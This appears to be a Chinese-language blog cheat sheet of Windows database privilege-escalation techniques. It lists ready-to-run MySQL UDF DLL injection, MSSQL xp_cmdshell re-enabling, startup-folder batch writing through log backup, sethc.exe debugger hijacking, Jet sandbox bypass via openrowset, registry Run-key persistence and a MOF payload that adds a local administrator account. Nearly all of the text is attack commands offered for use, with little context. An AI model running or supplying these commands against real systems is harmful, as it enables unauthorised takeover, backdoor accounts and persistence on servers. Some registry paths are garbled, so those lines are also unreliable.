UDF手工提权辅助
select @@basedir; #查看mysql安装目录select 'It is dll' into dumpfile 'C:\。。lib::'; #利用NTFS ADS创建lib目录select 'It is dll' into dumpfile 'C:\。。lib\plugin::'; #利用NTFS ADS创建plugin目录select 0xUDFcode into dumpfile 'C:\phpstu\MySQL\lib\plugin\mstlab.dll'; #导出udfcode,注意修改udfcodecreate function cmdshell returns string soname 'mstlab.dll'; #用udf创建cmd函数,shell,sys_exec,sys_evalselect shell('cmd','net user'); #执行cmd命令show variables like '%plugin%'; #查看plugin路径
小技巧:
1.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL 注册表中ImagePath的值为mysql安装目录
2.my.ini中datadir的值是数据存放目录
3.UPDATE user set File_priv =’Y’; flush privileges; 强制加file权
SA提权
1.判断扩展存储是否存在:
select count() from master.dbo.sysobjects where xtype = ‘x’ AND name= ‘xp_cmdshell’
select count() from master.dbo.sysobjects where name=’xp_regread’
恢复:
exec sp_dropextendedproc ‘xp_cmdshell’
exec sp_dropextendedproc xp_cmdshell,’xplog70.dll’
EXEC sp_configure ‘show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;(SQL2005)
2.列目录:
exec master..xp_cmdshell ‘ver’
(or) exec master..xp_dirtree ‘c:\’,1,1
(or) drop table black
create TABLE black(mulu varchar(7996) NULL,ID int NOT NULL IDENTITY(1,1))—
insert into black exec master..xp_cmdshell ‘dir c:\’
select top 1 mulu from black where id=1
xp_cmdshell被删除时,可以用(4.a)开启沙盒模式,然后(4.b)方法提权
3.备份启动项:
alter database [master] set RECOVERY FULL
create table cmd (a image)
backup log [master] to disk = ‘c:\cmd1’ with init
insert into cmd (a) values (0x(batcode))
backup log [master] to disk = ‘C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat’
drop table cmd
4.映像劫持
xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe’,’debugger’,’reg_sz’,’c:\windows\system32\cmd.exe’
5.使用沙盒进行提权
—提权语句
exec sp_configure ‘show advanced options’,1;reconfigure;
— 不开启的话在执行xp_regwrite会提示让我们开启,
exec sp_configure ‘Ad Hoc Distributed Queries’,1;reconfigure;
—关闭沙盒模式,如果一次执行全部代码有问题,先执行上面两句代码。
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0*Engines‘,’SandBoxMode’,’REG_DWORD’,0;
—查询是否正常关闭,经过测试发现沙盒模式无论是开,还是关,都不会影响我们执行下面的语句。
exec master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines**’, ‘SandBoxMode’
—执行系统命令select from openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,’select shell(“net user margin margin /add”)’)
select from openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,’select shell(“net localgroup administrators margin /add”)’)
沙盒模式SandBoxMode参数含义(默认是2)0:在任何所有者中禁止启用安全模式1 :为仅在允许范围内2 :必须在access模式下3:完全开启
openrowset是可以通过OLE DB访问SQL Server数据库,OLE DB是应用程序链接到SQL Server的的驱动程序。
—恢复配置
—exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0*Engines‘,’SandBoxMode’,’REG_DWORD’,1;
—exec sp_configure ‘Ad Hoc Distributed Queries’,0;reconfigure;
—exec sp_configure ‘show advanced options’,0;reconfigure;
6.xp_regwrite操作注册表
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentversion un’,’black’,’REG_SZ’,’net user test test /add’
开启
xp_oacreate:exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures’,1;RECONF
MOF提权
#pragma namespace("\\.\root\subscription")instance of __EventFilter as{EventNamespace = "Root\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject(\"WScript.Shell\") WSH.run(\"net.exe user admintony admin /add&&net.exe localgroup administrators admintony /add\")";};instance of __FilterToConsumerBinding{Consumer = ;Filter = ;};
保存为 1.mof
然后mysql执行select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
若有收获,就点个赞吧
0 人点赞
